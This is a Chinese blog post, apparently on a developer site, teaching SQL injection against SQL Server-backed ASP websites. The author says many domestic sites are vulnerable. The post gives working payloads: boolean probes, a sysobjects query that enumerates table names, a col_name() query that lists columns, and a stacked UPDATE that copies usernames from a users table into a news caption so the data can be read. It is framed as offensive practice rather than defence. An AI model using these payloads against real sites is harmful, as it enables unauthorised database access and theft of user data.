专门针对SQL Server的注入手段

小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比……

关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。

首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用' or 1=1 or '1'='。

而sql server特别的还有user>0,db_name()>0。但是这些手法都只是检测漏洞的方法,真正有用的在下面。

1、获得所有的Table表名

(Select distinct Top 1 name from sysobjects where xtype='U' and status>0 and name not in (select distinct top i name from sysobjects where xtype='U' and status>0 order by name) order by name)>0

i为一个整数,i取1时,返回第一个table name(按表名排序),2返回第二个,依此类推,直到什么都没有返回为止。

2、得到表名后再获得字段名(field name)

(Select Top 1 col_name(object_id('TableName'),i) from sysobjects)>0

这一句返回TableName这个表里第i个字段的名字

3、得到所有的表名以及里面字段名,估计对这个网站的结构也就有相应的了解了。然后怎样获得字段中的数据呢?

如果是字符串,自然用>0的技俩,如果是其它类型,那就找一个新闻之类的表,再用

;update news set caption=(select username from users where id=9) where newsid=100;--  之类的方法把你要的数据写出来,这样基本上就没有你不知道的内容了。

我自己用VB做了个软件,自动获得表名和字段名,速度极快,瞬间整个数据库的结构就出来了。

当然这些不过是sql语句的构造而已,没什么过多的技术,另外这一个网页也是sql server injection必备的哟http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_tsqlcon_6lyk.asp

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值